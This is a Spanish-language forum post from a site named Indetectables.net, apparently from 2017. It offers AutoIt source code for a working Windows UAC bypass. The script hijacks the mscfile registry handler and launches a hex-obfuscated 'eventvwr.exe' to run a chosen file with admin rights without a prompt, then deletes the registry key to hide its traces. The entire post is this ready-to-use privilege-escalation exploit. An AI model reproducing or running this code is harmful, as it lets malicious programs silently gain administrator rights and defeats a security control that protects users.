• UAC Bypass ( Win7 / Win8.1 / Win10 ) ( x64 x86 )

 #491385  por M3
 07 Abr 2017, 18:22
Buenas , algo libre de tiempo .... Ay les dejo esta chorrada ...
Saludos
:drinking:
#########################################
# RunAsAdmin [ UAC Bypass ]
# Works on Win7  Win8.1  Win10
# All versions( x64|x86 )
# Autoit 3.3.8.1
# Author : M3
# Indetectables.net
# Usage : sUacBypass(Full Path to File)
# Credits : Matt Nelson enigma0x3
#########################################

If IsAdmin() Then

   MsgBox(64 , "Hola", "Soy Admin  :-] " , 4)

   Exit

Else

sUacBypass(@ScriptFullPath)

EndIf


Func sUacBypass($sFileToBypass)

   Local $sRegReadUAC , $sGetBehavior , $sGetPrompt , $sHijackKey  , $OutputString , $sChar

   Local $sHoldString[13] = ["0x", "65", "76", "65", "6E", "74", "76", "77", "72", "2E", "65", "78", "65"], $OutputString

   $sRegReadUAC = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

   $sGetBehavior = RegRead($sRegReadUAC, 'ConsentPromptBehaviorAdmin')

   $sGetPrompt = RegRead($sRegReadUAC, 'PromptOnSecureDesktop')

   $sHijackKey =  "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command"


   If $sGetBehavior = 2 And $sGetPrompt = 1 Then

	  ConsoleWrite("UAC is set to 'Always Notify'" & @CRLF & "Can`t bypass !!!!")

	  Return 0

	  Else

      RegWrite($sHijackKey, "", "REG_EXPAND_SZ", $sFileToBypass)

		 For $sChar In $sHoldString

		 $OutputString &= $sChar

		 Next

	  $OutputString = BinaryToString($OutputString)

	  DllCall("kernel32.dll", "none", "Sleep", "dword", 5000)

	  DllCall("Shell32.dll", "int", "ShellExecute", "hwnd", 0, "str", '', "str", $OutputString, "str", '', "str", '', "int", 0)

	  DllCall("kernel32.dll", "none", "Sleep", "dword", 5000)

	  $sRegDelete = StringLeft($sHijackKey , 42)

      RegDelete($sRegDelete)

   EndIf

EndFunc